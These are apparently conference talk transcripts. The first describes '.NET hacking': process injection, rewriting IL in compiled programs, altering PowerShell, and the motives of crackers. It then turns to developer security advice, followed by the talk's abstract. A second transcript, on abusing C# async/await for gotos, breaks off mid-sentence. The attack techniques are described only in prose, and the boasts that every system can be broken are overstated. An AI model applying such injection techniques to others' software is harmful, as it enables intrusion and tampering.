think that.NET is owned by Microsoft. After entering the hacker world, that was one painful hurdle to overcome. It didn't really have much of any hacker tools. It's still a fairly small group of hackers that actually work with.NET or focus to any degree in.NET. Why hack.NET? You can get more code power. You can remold systems. No one can really stop you. I want to show you that everything that I do as a hacker is all simple lines of code. You can blend different technologies like assembly code and cobalt code. With the right skills, break any system. You can open any system that there are no actual locks. In security, all the locks are fictional. I want to just jump on a quick tangent for a little bit. I want to just cover that.NET is a standard like HTML. I prefer the standard that comes from ECMA and not the ISO versions. These standards, the ECMA I can print up and hand to you. We can like HTML have a common protocol. It's like an RFC. This is what makes.NET to me important. This one statement. This is a definition of the CLI, the common language infrastructure in which applications written in multiple high-level languages can be executed on different system environments without the need to rewrite those applications to take into consideration the unique characteristics of that environment. That means you can write a program and not care where it's going to be used. That to me is what makes.NET different. Unlike the previous languages, C++ and before you had to care whether it was going to x86, 64, this platform, that platform. It actually carries across what Java promised of cross-platform implementations. If you want to take.NET, you can take it to basically any platform you want. To follow up on this, Richard Stahlman, one of the grandfathers of open source, he came out and said you should not write software to use the.NET. Period, no exceptions. He also then followed it up with there's no reason not to write and distribute on free implementations such as Mono. To him,.NET and Mono were worlds apart. This is because.NET itself is Microsoft Mono is open source. It's just kind of putting.NET in context. When I say.NET, I'm using it completely incorrectly. I mean the CLI, I mean IL, the runtime. This is important to say that.NET isn't owned by Microsoft. Oh, it is owned by Microsoft. I'm using it incorrectly. I mean.NET, the concept, not the implementation that happened to be developed. Also, when I say C++ or code, I mean IL and Csharp are the same to me. I mean inside of the runtime is the same. And there's a little bit of, I take liberty with words throughout this speech. And that's interesting when I got into hacking. One of the biggest hurdles that I had was that security people and programmer people have the same words, work on the same systems, but have different definitions for them. When we as developers say stream, that means something very specific in the security world. When the security world says root kit, that means something very specific. And that was one of the major hurdles to get over coming from a programmer to a security world. And I'm still working on that one. And to kind of show what this ended me up in, I started developing different attacks. I started remolding systems. And just to jump into that, this is remolding PowerShell. And so I remapped PowerShell and I only took over the GUI. I, to me, rootkitted it and changed the base logic. And this is a core protected Microsoft implementation DLL to show you that nothing is off limits. Anything that you can touch on your system, you can change on your system. That with the tools and techniques that I'll cover later on, you can reach in and actually change the objects live in memory. You can change the IL on disk. You can change the assembly code in memory for a process. And that's kind of the interesting stuff that I want to note real quick. So when we talk about applications, we talk about intellectual property implementations. We talk about systems that do highly complex things. We talk about security and infrastructure that controls our world around us. And typically in the world, we build security systems to be like the physical world, to implement protection. And typically in the security world, we want to convey that you can't break it, that security will stop you, that it cannot be easily defeated, it can scale up. And in truth, security looks like this. It is a complex maze that is made to be hard to understand that hopefully no one else can solve except for the person with the keys. And the truth is that crypto is merely a random maze that if you solve it correctly, you get in. A password, nothing actually stops you from gaining access to a system. And in the security world, when you're willing to think outside of the box, that's doubly true. And so I developed a lot of tools around this. I developed, so here's, I want to bring what I learned in the security world back to the developer world. And say you have an executable and you lost the source code to it. This is a program that I built in school. I can drag and drop it in here. It's an executable. I can read the source code. And this has been around forever, that you could open up an executable and get back to source. And you could decompile it. I was fascinated by the fact that back in the day, there were C coders that came from assembly code and could come in and change a C program beyond what it was compiled to. So far that you would not be able to keep the code anymore because executable had evolved so far. And that's kind of what I wanted to have myself. And so I worked on this, where this is a branch on true. And this branch on true is in IL, which is the underpinnings of.NET, which relates to this not if. And we can change this branch on true to a branch on false. And it's this ability to go into a previously existing executable that I no longer have source code for and continue to change it, add to it, and treat it as though it was still source code. And to give you kind of a what it was like growing up as a.NET coder in C++. This is a parser that a lot of my peers in C++ wrote. And I wrote a parser for.NET where it goes through and tokenizes the language and turns it into an output of code comes in and object structures come out. And for me, that was the starting point. Trying to keep up with C++ developers that we're working on building base OSs, network stacks, compilers, all of these low-level things, but building them in.NET and finding my own way to develop them. And growing up in that school, it was basically, you can do it, but we can't help you. If you hit a wall, then you either find a way around it or you fail. And that was kind of my starting point of developing compiler stacks OSs in.NET. And I developed a number of free tools that allow you to edit on disk and in memory. Because when I attack your program, I basically see it as something that can easily be defeated that poses basically no protection against me. And typically, whether it's a web server or a database saving your money infrastructure, whatever it might be, I usually attack it in a few fundamental ways. If I can get your application to exception out and lock up, then I can basically use it and abuse it in ways that you never thought would be possible. And this allows me to come at your system and blow right past what security you thought you had and attack the security implementation that actually impacts me. And it allows me to bring weird things in. Like I can bring Erlang in. I can bring assembly code in. I can bring tools and weapons from all these other different languages to attack. And security is a old paradigm. As long as computers have existed, some form of security, whether it be physical or digital, has been evolving. And when I talk about using old tools, there's so much written in assembly code to attack that it dwarfs anything in.NET or Java even. That if you can leverage just 1% of that, you'll have more than is on the shelf today in.NET. And the truth of.NET is that you live in a system. This system is a run time. This is what we like to refer to as a framework. And to me, it's no different than DirectX. It's a framework. You are on top of it. You're outside of it. You can use it. And some of the rules of the framework can be bent and others can be straight broken. And this framework is not enclosing you. There's no necessary barriers actually keeping you inside of the framework. And this basically comes out. And you have a variable. And you don't think anyone else can write to that variable. Why? What makes you think that your memory is actually separate from another process is memory. That there's OS protection. There's nothing in the OS that actually stops me from writing to it unless it's at a different privilege level. If your user and I'm user, we can talk to each other. And I can access write, remold your variables at will. And that's where programs came in for attacking in memory. And it's actually the part that I enjoy much more. So if we take something, let's see. Let's see. We'll find something to attack. So here's an executable that I wrote a long time ago. I want to go on a quick tangent that I wrote this for people that have scotopic sensitivity. So if they say that this green color works better for them or this color works better for them, it will help them. And this has actually been one of my best developer tools that I ever made. This tool has allowed me to code late into the night. That being able to come in and set my screen brightness, the actual light as low as possible and then go into Windows and turn it to as dark as possible. Buys me a couple of extra hours at night of being able to code. And when your eyes are like, oh, you turn it down, you'll have a couple of extra hours. And so let's look at this. IA, I can remold it since I can edit it on disk. And this program targets an executable. It identifies the process ID and injects a bootloader into it. And this bootloader takes other executables. And this is kind of where, I guess I would say for a developer, this is where the rubber meets the road of things that you can't do before that are so easy, stable, and deployably ready. I can take other executables and load them in. So I'm taking multiple executables and loading them all into the exact same memory space. And this is important because no longer is there a separation between these GUIs and sharing variables. There's other ways to share variables and access variables. But at this point, these are all in the exact same memory space. To the computer, these are the same. And malware is, I would classify it to me, as self-aware, as able to impact its own existence or existence inside of something else. So this payload comes through and adds a button to any existing GUI. And these buttons themselves are aware and able to access the GUI that they're on. And so this button goes through and changes all of the strings. And this is the ability to say I said, okay, at runtime, I want you to connect into SQL Server Management Studio, and I want you to convert it to finish. You can now do that. That's completely doable. You maintain stability. You are working at a high level. You're working with actual.NET objects. And you can just go through and change it to finish. And these are things that would be incredibly hard. And this is 10, 20 lines of code to carry this out. And this one, ripping it off, serializes a button on one form and deserializes it back into a button on another form. And so you would be able to take, say, SQL Server Management Studio again and your third-party plug-in and put the third-party plug-in anywhere on any form in any way in SQL Server Management Studio and integrate not caring about an API, not caring about anything else, that this one over here, which is some other random executable, now still works. I serialize the button, took the events off, took the events all the way down, put it on another form, put the data for the button back up, and took the events and relinked them. And that's easy. That's 10 lines of code. And it's stable. I'm maintaining that link between that GUI object. And of course, from the... It's also fun because you can make anything run away, so you can't click on any GUI objects anymore. And this is three lines of code. It's on hover over, move away, right? And this is a lot of power for just a few lines of code. And all of this stuff that I'm setting is all in.NET and all quite easy to use. And it's all stable. I'm able to spin up multiple executables, GUIs, intermesh their objects, everything about them, and turn them essentially into one cohesive application and keep it stable. And this is what security has brought up. And that's why hacker power-ups, I'm not exactly sure for the term to be used because it's not that you can suddenly break into any system. I would equate it more to being able to work out. That you work out for hundreds of hours and you gain a lot of power, but that doesn't mean that you're going to mug people. It just means that you have that power. And suddenly you don't need to go and ask for something. You don't need to ask for database credentials. That you understand that the SSL implementation between server A and B is completely broken and you don't need to go ask for an SSL cert anymore. You can just force a cert. And this is what I'm trying to bring back to the community, that you have all of this extra power that allows you to do completely bizarre and before I started doing it, I would have thought impossible things. And when it came down to it, most of the things that I did and wanted to do turned out to be three or four or ten lines of code. That running assembly code in.NET was five to ten lines of code. That integrating with other people's platforms and using someone else's executables and API was easy. And that's where tools like this came in. I wanted to take what I did and bring them back to you and an easy to use. You don't actually have to understand how they work. You can just boot it up and that this function is private. A class might be private. And this is what APIs give us. And when you're able to access and manipulate code, you can say I want to take this from private and I want to make it public. And you can now take someone else's executable or DLL and just it's public. You don't need to ask for an API anymore. You can use their DLL as if it was your own, as if you actually created it. And that's kind of what I want to show that this isn't just about hacking. This is about taking a Java jar that the programmers all left ten years ago porting that into.NET and accessing. And it's about taking some other random application like SQL Server Management Studio and being able to put it in Swedish or Norwegian or Finnish in just a couple of minutes. And then being able to go through and show that it produces essentially the same output as a normal DLL or executable. You're not giving up stability or production quality to do so. And the same thing with injecting in memory. That when you're injecting into other processes that you can say instead of an API into that application, I'm going to crawl into memory. And I'm using normal Windows calls. I'm using normal application to application communication. And so there's a part of me that almost doesn't like the word hacker. I mean, it's appropriate in the security community, but in the developer community, I would equate it more to really working out or being bitten by a radioactive code bug that suddenly you can go through and convert a Java jar to.NET. You can convert Delphi to.NET. Deprecated now Pascal to.NET. Cobalt and VB6. And that when you come up to a project and you want to work with a Java developer, you can now work in the same platform. That's kind of the beauty that was unstated for me about.NET. It was developing a, you can write and deploy on any platform. But it's also intermediate where you can take a Java intermediate language, map that to.NET and deploy it on a Wii, an Xbox, that you can take.NET and turn it into 64-bit code, X86 code. You can try and put it back in the JVM. That's a little sketchy. You can export it to Cocoa and Objective-C code. You can port it straight to an ARM. And this is an ARM device. This is the one I prefer, tiny CLR. And it is an ARM processor with a stack that's built entirely from.NET. And so for a couple of projects, I needed to write attacking hardware. And it was like, well, I don't want to learn some low-level stuff. I want to use high-level objects. I want to use arrays. I want to use.NET. And it does. It just ports out into ARM. And it's a great way to think that for basically any platform that you want, that.NET can try and bring you future and past compatibility. That it can also, in runtime, combine multiple things. That you can combine.NET with assembly code. So if you have an assembly coder writing for a game, and he's written the best game in detection, loop of all time, and assembly code that.NET could never touch, you can now natively map that. And I'll show that later on. That you can have a normal.NET call going into pure assembly code. And you can take the.NET runtime and Java runtime and mix and spin up a Java runtime inside of the.NET runtime. That there is things that are stable and easy. And most of them are free. Some of them cost a lot of dollars. But when you want to go to mobile, when you want to build once and deploy everywhere, you build business logic. You can go to a 1990s Nokia Symbian phone. It's now a little deprecated. But it's that idea that whatever platform you want to go to, that.NET can basically take you there. Whether it's a gaming console, embedded hardware, and that's kind of the unspoken beauty of.NET. So let's go on a quick tangent. My tips to the developer. As a security person, I go to companies and I help them defend their applications. I help them defend their infrastructure. I help them do security code reviews and security unit test implementation and life cycle. But also there's the people and the developers. And the developers to me are incredibly critical. Some of the security tools for me that have the most power for the least effort. Virtual systems using crypto, full disk, firewalls, security unit tests. And that's, it sounds like, when you actually get to implementation of firewalls or sandboxes, as a developer, they can come incredibly handy. That a sandbox can help in the testing environment. Where you want to constantly revert or you want to control state or you want to dissect changes, sandboxes come incredibly helpful. Firewalls are really good at logging and hunting down network errors if you're doing communications and timing glitches. These different things can actually help. They're not just security impedances. And so when I come into a company and I sit down in front of a development team, I see incredible risks. That developers have basically the keys to the kingdom. We're the ones that build the locks. We're the ones that build the keys. We're the ones that work with the critical systems day to day. And that this is a point to defend. Since I'm talking to developers, of course, I'm going to talk about that. And on a typical bad developer box, I might see everything crammed together. Databases, keys, visual studios, all sorts of web traffic. And this is for me in terms of going after a company. I understand the developer world and I've tried to identify security risks in the development environment. And unfortunately, visual studios is one of the, has a few known vulnerabilities where someone can write code, put it up on the internet when you look at that code, specifically the forms, it runs arbitrary code on you. That visual studios itself can be a threat. That browsers are a threat. And you have the keys to the kingdom. If someone steals your laptop, this is what they should see. Just complete crypto. That you have to unlock the laptop. And inside of the laptop when you unlock it, it would be best if there was multiple crypto blobs. And I'm going to try and condense, like two days out of a seven day course, into a few minutes. You have firewalls on there. You have the internet, but you have a restricted internet. You have all of this critical infrastructure on your laptop and you want to defend it. Inside of your box, you have a crypto blob. And this crypto blob is protected and houses a VM. This VM, you unlock it and this gives you whatever it has inside of it, right? You have multiple VMs. You have one that gets you online. You have one that you do development in. And so when you want to go browse Reddit and click through the internet, that's different than when you log onto your corporate network and access the database. And I recommend multiple VMs. It's really easy. And it's nice to have one VM that you go and check your email with. You do your banking with. You stay relatively secure and pure with. And another VM that when someone sends you a link that you want to click on, that you know you shouldn't click on, that there's another VM you go to. When you want to just go around the internet, there's another VM and you lock that VM down and use it for that purpose. When you want to do development and you want to push to an enterprise-wide change, there's another VM. When you want to access critical documents and infrastructure, you keep your data secure. And each of these is inside of a crypto blob. So your niece comes up to you and wants to use your laptop and you open up the VM so she can just cruise the internet. Everything else is in a crypto blob that's locked down. And so even if somehow she got infected, someone broke out of the VM, they're inside of a computer with multiple crypto blobs. And you can say, well, if I close the laptop and throw it in the ocean, then they are not getting whatever they were trying to get. And it's easy. It's when it comes down to it, you're talking about true crypt or whatever discrypto you choose. You're talking about putting a VM image inside of that, mounting that as a drive, mapping that with a hot key. You hit a hot key, you put in a password and it unlocks. And inside of dev crypto, you have Visual Studios that goes to a sandbox for testing so you can iterate through, not sandboxing for security, but sandboxing for speed of testing. You're connected to secure network infrastructure. You're basically using those keys that you have over your company. In the web, you have a sandbox. Inside the sandbox, this as security is housing a browser and stopped with a firewall. So you can only, in this sandbox, you can only use port 80. You don't need FTP going into this box. You don't need SSH going into this box. You're only browsing in this box. And so you lock it down. And by default, you have scripts off. And when you have the box that you go cruise the good internet that houses your personal life, you have multiple sandboxes for keeping it clean and wiping down the information. Not so much protecting you, but protecting you in the future. And that comes down to authentication. We talk about passwords that aren't hard to remember. So you can use them on a daily basis. Physical tokens that are easy to replace. And fingerprints or whatever biometrics. And it basically comes down to three factors. Something you know, something you have, and something you are. And unfortunately, this doesn't in the daily life work. You want your smart card to be so cheap that you don't care about it. You I recommend Yuba keys and that you for, I think, 20 US dollars, you get a Yuba key, it stores a really long complex password, you put a short password with that and it becomes incredibly hard. If you lose your Yuba key, definitely buy backups, because not only can you lose them, but they do expire. They do die. They are physical digital devices. You just grab another one out of the vault. If it's logging you into your core infrastructure of your network and your company, you just go to IT and say, hey, I need another access token. I need you to change my token and give me a new random 30 character, 60 character password. Fingerprints, to me, I don't get them. I don't understand how people think this is secure. If you work at company A today and you log in with your fingerprint and you go work at company B, you can't change your fingerprint. This seems unsustainable and just unreasonable, but there's multiple multi-factor authentication types. And we're still trying to figure this out. And I recommend finding your own solution. Everyone should find their own thing that works for them on a daily basis. So I recommend, I like Firefox because it gives a little more privacy, but any platform basically has the ability to turn off scripting. If you come into add-ons, privacy and security, there's no script. There's ad block. There's ghosty. And some of them are about security, like no script and ad block and ghosty are more about privacy. And there's multiple faces of security. And so I highly recommend using no script that this has saved me so many times from attacks that I, it's also saved me so many times when I want to do different attacks, having scripts off can also become handy. It also comes into anonymity that when you're browsing the Internet using proxies, hiding your identity is good for a normal person and for someone that is a developer or in security. So my top three tips, useful discrypto. Log into your laptop. You can do this with biometrics. I'll look at that a little later, the security of biometrics itself. And having admin and email and having your admin part of your identity separate from your identity. That if you send me emails from address A and you go to your bank and unlock it with address A, I know how to attack that. If you log in to it with some random Gmail address, whatever address, and you don't use that for any part of your public identity, that that stands up a little better in the day to day. That if I send you a malicious email and you click on it accidentally and it's in your public identity, then I don't have access to you at that time with the same email address as the one you log into your bank. And if I send you a malicious email to you at your bank, you are much less likely to click on that link. If I say, hey, we met at the conference and I was really interested in your company, just click this link and fill in the form and I send it to your banking address, you know that you did not give me your banking address. And so I highly recommend separating your admin identity from your day to day identity. Keep them completely separate. And that's a really good buffer. And whatever your password scheme is, find your own that works for you. Find a way to keep your passwords not the same everywhere, but in all honesty, looking at most people, they have 100 or 200 passwords, user names, identities on different platforms. And whether that's dealt with cloud storage, password management like LastPass, on disk, KeyPass, KEE, Pass. And these different implementations, LastPass in the cloud, KeyPass on your side, are steps. Everyone needs to find their own way to manage it because there is no one solution. If KeyPass or LastPass became the standard across the world, it would be attacked across the world. That in actuality, what keeps us a little more secure is a fair amount of diversity. So that's my really long tangent for, hey, you're a developer, here's a security I recommend. So back to bending and breaking. Actually looking at the.NET framework, actually looking at what we're dealing with on a day-to-day basis. That there's a hierarchical structure that allows you to do certain things with certain objects. That when you're attacking a SQL communication object deep in someone's business application, what can you do to it? And when you're looking at IL, that there's all sorts of tiny little gotchas that can make the difference not only in security, but in speed and performance. That if you have a short jump, which is like a branch, so an if branch, if you have an if branch that can be in an 8-bit integer, so it's pointing to a location relative to its own location that can be represented by an 8-bit integer, that is different than a branch that has to point to over 265 IL statements away, and IL statements have a size. So there's actually a 32-bit and an 8-bit branch. And this is also the same as there's a difference between making a i equals 7 and an i equals 9, that these are two differently weighted things. And this is kind of what to me speaks back to the developer, that in IL, that your implementation for a branch is one way, and for the int example, 0 through 8 are hard-coded as single IL lines, and above 8 is coded as IL integer and number. And so if you have a small loop and you can keep it 8 or less, you actually can see a size and speed improvement. And looking at being able to bend and break the rules, that you can actually start considering that your break instruction when you're debugging actually has a line of IL, and that these are all codified and basically RFCs, their standards, they're defined, and that they start allowing you to think about things in a different way, that you can now think that there's a memory-to-memory copy instruction. And so if I said I want data structure A to be copied into data structure B of a different type, and this has to be incredibly fast, this has to actually run 100 million times a second, that the fastest way to convert an object is called a bit blip, where you basically take a line of bytes in location A and you put it in location B, and you just happen to be pulling it from a data structure and putting it on a data structure. And so when I was processing network streams, this was incredibly important. When I wanted to process gigabytes of data through a network stream, I needed bit blitting, and this can be carried out from assembly code, C++ pure interacting with.NET and.NET pure. And that's what I'm trying to bring back, that what you do in C sharp or VB is on top of IL, that IL is underneath, and you can code and use IL itself. And you can duplicate values. It's one of my favorite IHEL codes ever. I use it all the time, and when I come across the variable somewhere, I duplicate it and branch it and split it into two places. And I think it's just a beautiful line of IL. It doesn't have too much to do with much. And there's two different classes of people when you do talk about attackers. You're talking about hackers that are there to have fun with your system, that for the most part, whether they're successful or fail, you'll never notice they're there. And there's attackers that if they're successful, you'll probably either know they're there or you won't. And you're developing a product. You have a production facility, and it produces a product. You have clients that use this product, and clients give you money. And this is kind of the basic life cycle that I see when I look at a developer's world and a company's world. And that part that we're primarily concerned about is that coupling between users and money. And hackers are like, haha, I cracked you. It's fun. And you're like, well, that's all my money. And they're two fundamentally different groups of people. They have completely different goals. And for the most part, when you're talking about cracks, you're talking about they're finding a flaw in your code. They're making a modification. And it's for completely different reasons than when a hacker, an attacker comes after your company or your product. And typically with a cracker, they're either doing it for enjoyment. They're doing it because they just want your system to work differently. Or they have a little bit of infrastructure that they need to support. Typically when you put out cracks, and why do you put out a crack? What is the driving factors? So say you put out a crack and you're able to infiltrate a product that has a million users, 10% of that user crack, and you're able to take over that many machines. You now have an immense processing facility, data storage facility, proxy facility. And this is incredibly valuable to a day-to-day implementation life cycle of a hacker. That if I can say I have a proxy network of 10,000 machines that I can use at any time, they're not traceable to me because I no way paid for them. And I can wipe down my tracks on those machines willy-nilly. That's incredibly powerful. If I can say I can utilize 500,000 CPUs and GPUs to crack a password, that's powerful. And it's a different incentive that you happen to be going after the thing that's connected to the money, but you don't actually truly care about the money. That's not part of the goal. It still has the same impact where it gets used up. The facility goes out and the product might eventually die. But that's not your goal. But when you're talking about, oh, I want to steal a product. I want to take their product and I want to rebrand it as my own. I've seen that. I've seen lots of people who are under attack and someone is rebranding what they do. And someone wants to steal their users or their production or their money flow. That's a different motive. And when it comes down to it, building a secure app and a secure infrastructure and using the right security, this is what we're responsible for as developers. In an infrastructure and an enterprise, we make the base decision that changes the implementation of the enterprise and the security is built on that implementation and is often limited by that implementation. The tiny choices, whether we decide to use this protocol or that protocol, this storage or that storage, makes a world of difference in the actual security implementation of the entire enterprise. And whether we decide that we're using SQL and we're going to store the database credentials inside of the executable and don't worry, we'll encrypt it inside of the executable. No one can get the database credentials out of that. But as a hacker, as an attacker, you can use access to a database to take over the database server. You can use access to different things to just take over and rip through an enterprise end to end because a developer decided to use that. I highly recommend a service-based architecture. Put something in between you and the database. Use credentials but not database credentials. Your system should authenticate the user based on its inside. It's this user. They do have access to these infrastructure and that goes through an ORM. It goes through entity or hibernate or whatever it might be. And I often recommend entity over anything else because it's one of the few that's default secure against SQL injection. When you talk about SQL cleaning, you will almost always lose SQL cleaning fights because six months from now, a year from now, ten years from now, someone finds one tiny little flaw that they're able to bypass your SQL cleaning and whether or not you know about it or whether or not you know about it and decide to go back and fix your mistake. That SQL cleaning in the real world is like AV. It just doesn't stand up to anything. That if someone wants to get through it, they do. And we can try and lock down our application and obfuscate it and defend it. Bad news, obfuscation is programmatic and basically anything done programmatically can be undone programmatically. And for, I would say, 80, 90% of the obfuscation and protection market, there is a off the shelf hacker tool for free that rips it apart. And you can take weeks and weeks of work to get a properly defended application and drag it and in six seconds you have a completely undefended application. And I, it's not as easy as it sounds. Also, in obfuscation, just a quick side note, publics are not typically obfuscated because they're considered to be more like an API. So unfortunately, you want to go through and make as much of it private as you can. And when we talk about a hacker, an attacker attacking our company, they're not trying to build a botnet out of our user base. They might break all of the links, but then they might take our product and attack our clients. So one of the most critical and vulnerable systems that I see that isn't defended is your update mechanism. That the way that you push updates to your clients means the same way that I could push updates to your clients. And whether it means I go to their network and take over their network and then say, yes, I'm xyz.com. Here's your new payload. Please run malware across your entire enterprise client base on a local network. Or somehow I take over your web server or I reroute your domain for just a couple of minutes and I'm able to take over your user base. That is a critical system that you should be doing crypto for security and crypto for validation. And I'm using that public private key crypto showing that I encrypted it with my private key that hopefully no one else can figure out. And if I signed it, if I encrypted it with this key and not AES, like I hard code a password in and I encrypt it with AES and I send it to you and you use the hard coded password that's in your executable that anyone can see and decrypt it and install it. And that's one of the subsystems that is the most devastating to companies because it's one thing to lose your money supply for a couple of months. It's another thing to have your entire credentials as a company destroyed because you pushed malware to massive enterprises and crippled their security that they spent millions of dollars setting up. Or the hacker just takes your product and does something malicious or crazy with it and weaponizes it or whatever it might be and you might not think that your product has much value outside of its domain because you're using it for that but someone decides to use it as a DLL in their attack application or repackage it and ship it out somewhere. And they go after maybe your infrastructure, your routers, take over your access to bank accounts or whatever that might be and just basically cause mayhem and destruction. And the hacker world is kind of like, well, we control your databases. You are asking us to build your protection. You're using typical IT best practices infrastructure. We're the ones that define the internet. We are the ones that basically create your implementations. And it comes back to the developer. It comes back to the choices we make. Do we use SQL or do we use an ORM that gives us access? Do we use a service-based architecture? Do we use direct TCP pipes? Like these things make a world of difference when you're trying to put security on top of them. And baking insecurity from the ground up is important. And that's kind of what I also wanted to bring back, that you can take my applications and look through them. That I've looked over other people's applications and found that they were doing crypto. But they were doing it completely wrong. That they weren't doing vector initialization. They were using the wrong implementation. And in some cases, they just didn't turn it on. And then you can actually go and vet the security of other people's applications that you use, the implementation that they use, and not just consume it. And as an attacker, you can basically do anything to an application on your box. You can, as an attacker, try and go and gain access to other boxes. And in the real world, it's actually quite easy to gain access to other boxes. And I'd like to wrap that up and have a little bit of Q&A and cover different implementations. I'll do a little bit of code, and I'll walk through the different techniques that I do. I'll cover that a little bit now. We'll take a break and then come back and do another speech. And I'll get into stuff that actually, on the day-to-day, that I do to hack. That what does it look like to reach into someone else's application and remold it? What does it look like to use someone else's executable as a DLL? What does it look like to take a Visual Studio's project and weave in all of this hacker technology? And so that's it for now, and hopefully I'll see you at the next speech in a few minutes. Thank you.
|
When I first entered the security world as a .NET hacker it was an unfriendly territory, as .NET was a blackSheep in the hacking world.The current world of hacking is warming up(a bit) to the .NET hacker. Tools and skills are becoming more prevalent, targets and value are everywhere, the need for .NET security is prevalent. This presentation will give the .NET hacker current hacking tools and show a path for developing hacking under the .NET Framework.This presentation will focus on the world of the .NET hacker and not programming: Learn basic hacker tools for leveraging a networkBreach to Infect and take over a critical system/application. See what a hacker sees when they look at an application, how one crack in the security land scape can give full access to a hacker. Learn how combining Java, Pascal, and Raw-Machine-Code into your application has value.This will be different from a normal hacking 101 as it is focused completely on the .NET Framework for the average developer.A second speech will focus on the code and process that one uses to do .NET hacking.Suggested Reading: The Hacker Manifesto.
|
10.5446/51450 (DOI)
|
Okay, I make it 20 past 10. Good morning, everyone. This is good. I had heard some rumors of Norwegians being reluctant to participate in things. I'm hoping this is untrue, so everyone wave your hands in the air. Everyone go, whoo! Okay, good. Frankly, I live on the audience feedback, particularly for a session like this. Hands up, those of you who came here hoping to learn something useful about C-Sharp, go now. This is not intended to be a session to help you with any productive C-Sharp whatsoever. It is all evil stuff that you should in no way ever use in production code. Okay, the neat little tips and tricks, well, tricks, but not tips. When I first presented most of this code in Codemash, I had a few members of the C-Sharp development team present. Is Scott Guthrie watching this somewhere? No? Okay, I was hoping that I could make him cry. Maybe he'll see the recording. So, yeah, trying to get any useful information about C-Sharp out of this is like watching a Star Trek film and trying to get physics. Okay, it's not going to happen, but I hope we'll have a lot of fun. It's just for entertainment. So, I hope I can make you cry a little with some weird stuff. So, let's start off with some not C-Sharp, in fact. Some basic. How many of you started, how many of you had your first programming language was basic? Good, I'm not the oldest one in the room then. So, this was, we had BBC Micros at school and typically everyone would start with something like this. I mean, in fact, the first version would just be 10 print hello, 20 go to 10. Yeah? Everyone's done that. Okay, so these are the good old days and it's a bit of a shame that we can't do this in C-Sharp. So, we have something similar, labels like this. So, we can do a labeled go to. We have the label up here and then as soon as we say go to loop, that will work. So, if I run this code and we want go to labels, it says hello and we can say keep going, yes, yes, yes, and then say no. And that's all very well, but you've got to have this label. Isn't it much cleaner and obviously much more maintainable to have line numbers? Thanks to C-Sharp 5, we can. So, here we have some code and I'll run this code and then we'll have a look and see whether people can work out how it works. So, this is go to async, the first version. So, we say keep going, keep going and then we eventually stop. Okay, let me just prove that this really is using the line number. So, you can hopefully see it's probably quite small, but line 18 is this keep going. If we look down there, it says line 18. So, if I change this go to 18 to go to 17, it should now do hello, keep going, hello, keep going, hello, keep going, hello. When I run this at code mesh, I managed to run the wrong program at this point and was mortified that it didn't change anything. So, there we go, hello, keep going, hello, keep going and then we can say no. And just one final proof point, if we go to 19, this should just say keep going once, but keep asking us for input until we do, until we press anything other than Y. So, good. So, are you satisfied that we've got go to with line numbers? Yeah? Satisfied that what I'm saying this program does, it actually does. Any ideas how it might work? It uses two of the new features of C sharp 5. Macros, no, we don't have macros in C sharp. We're not Lisp yet. So, let me reveal a little bit. Well, we can see that there's an await and we're going to await a go to action. Let me reveal a little bit which is why I had to change screens and why I wasn't going to change the font size again with everything up. If we just scroll over here a bit. So, now everything's clear, right? No. So, we're clearly using async and await, but there are no tasks involved here. Async and await basically builds a state machine. How many of you have used async a little bit? Yeah, even just to play around with. Have the basic idea. Okay? How many of you have looked into some of the details of what goes on behind the scenes? Okay, good. Those of you who haven't come to my talk tomorrow, the last slot basically of the conference. I'm doing C sharp 5 and exactly what level of detail I go into will depend on what people already know, but we may well cover the details there. So, basically, an async method, the compiler builds a state machine for you and it's all based on go to. It remembers what state you're in and when you await, it says, okay, I'll remember where I am and then later on you can come back to the same place, which is very nearly what we're doing, except we're saying we don't want to come back to the same place, we want to come back to somewhere else, which is basically if we have a state machine and it has a field remembering its state, all we've got to do is poke that state with a different value and things will be okay, right? So, here I await underscore, which is a line action. Line action is just a delegate, but I'm actually awaiting the results of calling this delegate and when I show you the declaration of line action, it will make a bit more sense, hopefully. So line action is a delegate that has call a line number attribute on the parameter, which means if you don't specify a value for this parameter, it will fill it in, the compiler will fill it in with the line number. So, effectively, our code is await, this is 17, 18, 19, 20, et cetera, et cetera. And then what this is actually doing behind the scene, so we have this go to executioner, remember the line action part and the go to action, I think go to action is just another delegate, and go to executioner remembers a mapping from line number to the internal state number that the state machine is generating for you. And it does this by when you await something, this line, so it's going to, at some point, it will call our entry method, passing in this line action that we're going to call to remember the line numbers, and if I go to executioner. So it passes in the line method created as a delegate for the record the line number part and go to for the rest. So the line method, when you call it, it returns an awaitable. And that awaitable remembers when you await it, it remembers the state that you are in when you await it. So we have a create awaitable, I have this idea of a state machine, there's already IA sync state machine is part of the framework, but I have various extensions on top of that, which basically use reflection to fetch and poke the state. So we happen to know that the generated state machine always contains a field called angle brackets one underscore underscore state. So all we need to do is fetch the value of the state when we await, because the compiler will have, when we're executing it, the compiler will store that state so that when we come back to it, all we've got to do to come back to that line is poke it with the same state that it is when we await it. So that's what get state and set state do, and all our go to executioner does is create an awaitable which always says, yes, I need to await, otherwise the state machine won't actually bother doing all the rest of the stuff, and then it's got this, a yielding a waiter has a cunning thing to say, right, what should we do when we've completed, either keep going as we were or go to somewhere else. The details of all of this are fiddly to say the least, I will attempt to make the code available at some point, but do you basically get the basic idea? So if we've got a state machine, what else could we do with it? Well, in fact, I think it was Kerala Senkov blogged a version of this, but one thing you can do with state is save it. So I have another example, save state, where the method just looks like this. So the first time we run it, we'll see this looks like this is the first time through, and we can just keep going until we hit N. So yes, we'll keep going, and then we're bored. So I is for, let's just finish there. And then next time we run it, I is for again, and we can continue, and we're bored again. So these are genuinely separate processes. We're just saving the state, and yes, yes, yes, and then we've completed. And we can add something else. So we could put string, sorry, let's get the current time, the start time. Obviously, you wouldn't use datetime.now in production code because it's horrible in various different ways, would you? You would use notetime, right? Okay, so let's just put, so this will be in a loop, kind of nasty, but okay, so we'll have deleted the state because we completed last time. So if we start up, okay, so it started at 1031, keep going, keep going, bored now, 1031.49 we're looking for, save state, 1031.49, and it keeps going. And we didn't have to say anything about, well, we've got another variable to save. Even though this is a local variable, the way the state machine is built, it will end up as a separate object. In fact, it's a struct on the stack until it needs to be an object on the heap because the way that async is implemented is quite ridiculously efficient. It's horrible, the hoops they go through to make it efficient, but it's great that it works. So all I'm doing is taking the instance of that state machine, finding only those fields which I actually want to persist because there are some that I don't, saving them just with the normal serialization, just a normal binary formatter, and I'm going through a few little bits and pieces so that we can save null references as well, and that's all it does. Right, I shall leave, I have another demo of retrying stuff, so it's more of the same really. We have a state machine. Imagine you could try some stuff and if it failed, a bit like onerrorisume next, except this is onerror, just go back to where we were because we 